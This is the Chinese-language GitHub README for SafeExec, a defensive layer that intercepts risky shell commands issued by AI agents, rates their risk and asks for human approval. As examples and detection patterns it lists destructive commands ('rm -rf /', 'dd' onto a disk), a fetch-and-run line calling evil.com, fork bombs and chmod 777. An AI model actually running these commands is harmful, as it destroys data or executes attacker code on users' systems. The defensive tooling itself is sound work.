Skip to content

OTTTTTO/safe-exec

BranchesTags

Repository files navigation

SafeExec - AI Agent 安全防护层

🛡️ 为 AI Agent 添加最后一道防线 - 拦截危险命令,保护你的系统

License: MIT OpenClaw Security ClawdHub

🌐 Languages: 中文 | English

✨ 为什么需要 SafeExec?

AI Agents 是强大的助手,但也可能造成严重损害:

  • 💥 误删数据 - 一句"清理临时文件"可能变成 rm -rf /
  • 🔥 系统破坏 - "优化磁盘"可能执行 dd if=/dev/zero of=/dev/sda
  • 🚪 安全漏洞 - "安装这个工具"可能运行 curl http://evil.com | bash

SafeExec 就是为解决这个问题而生。

🎯 核心功能

1️⃣ 智能风险评估

自动检测 10+ 类危险操作,分级拦截:

风险等级 检测模式 示例
🔴 CRITICAL rm -rf / 删除系统文件
🔴 CRITICAL dd if= 磁盘破坏
🔴 CRITICAL mkfs.* 格式化文件系统
🔴 CRITICAL Fork bomb 系统 DoS
🟠 HIGH chmod 777 权限提升
🟠 HIGH curl | bash 代码注入
🟠 HIGH 写入 /etc/ 系统配置篡改
🟡 MEDIUM sudo 特权操作
🟡 MEDIUM 防火墙修改 网络暴露

2️⃣ 命令拦截与审批

用户请求 → AI Agent → safe-exec 执行
                         ↓
                    风险评估
                    /      \
               安全      危险
                |           |
            直接执行    请求批准

3️⃣ 完整审计日志

所有命令执行记录:

  • 时间戳
  • 命令内容
  • 风险等级
  • 批准状态
  • 执行结果

🚀 快速开始

方式 1:对话式安装(推荐)

最简单的方式 - 在 OpenClaw 对话中一键安装:

Help me install SafeExec skill from ClawdHub

或中文:

帮我安装 ClawdHub 中的 SafeExec skills

OpenClaw 会自动:

  1. 从 ClawdHub 下载 SafeExec
  2. 安装到系统
  3. 配置并启用

方式 2:使用 ClawdHub CLI

# 设置 registry
export CLAWDHUB_REGISTRY=https://www.clawhub.ai

# 安装 SafeExec
clawdhub install safe-exec

# 启用 SafeExec
echo "Enable SafeExec" | openclaw

方式 3:从 GitHub 安装

# 克隆到 OpenClaw skills 目录
git clone https://github.com/OTTTTTO/safe-exec.git ~/.openclaw/skills/safe-exec

# 添加执行权限
chmod +x ~/.openclaw/skills/safe-exec/scripts/*.sh

# 创建软链接到 PATH
ln -sf ~/.openclaw/skills/safe-exec/safe-exec.sh ~/.local/bin/safe-exec
ln -sf ~/.openclaw/skills/safe-exec/scripts/safe-exec-*.sh ~/.local/bin/

# 启用 SafeExec
~/.local/bin/safe-exec --enable

💬 使用方法

启用 SafeExec

对话式命令:

Enable SafeExec

Turn on SafeExec

启动安全命令执行

启用后,SafeExec 在后台自动监控所有 shell 命令。

正常使用

启用后,你可以正常与 Agent 对话:

Delete old log files from /var/log

SafeExec 会自动:

  1. 检测这是 HIGH 风险操作(删除)
  2. 在终端显示批准提示
  3. 等待你批准后执行

安全操作直接通过

低风险操作无需批准:

List files in /home/user/documents

这会直接执行,无需干预。

查看状态

# 查看待处理的请求
~/.local/bin/safe-exec-list

# 或使用完整路径
~/.openclaw/skills/safe-exec/scripts/safe-exec-list.sh

# 查看审计日志
cat ~/.openclaw/safe-exec-audit.log

禁用 SafeExec

对话式:

Disable SafeExec

或环境变量:

export SAFE_EXEC_DISABLE=1

📖 详细文档

想要了解更多?查看完整文档:

🔗 相关链接

📊 许可证

MIT License - 详见 LICENSE

⭐ Star History

Star History Chart

如果这个项目对你有帮助,请给个 ⭐️

About

AI Agent 安全防护层 - 拦截危险命令,保护你的系统

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

12 tags

Packages

 
 
 

Contributors

Languages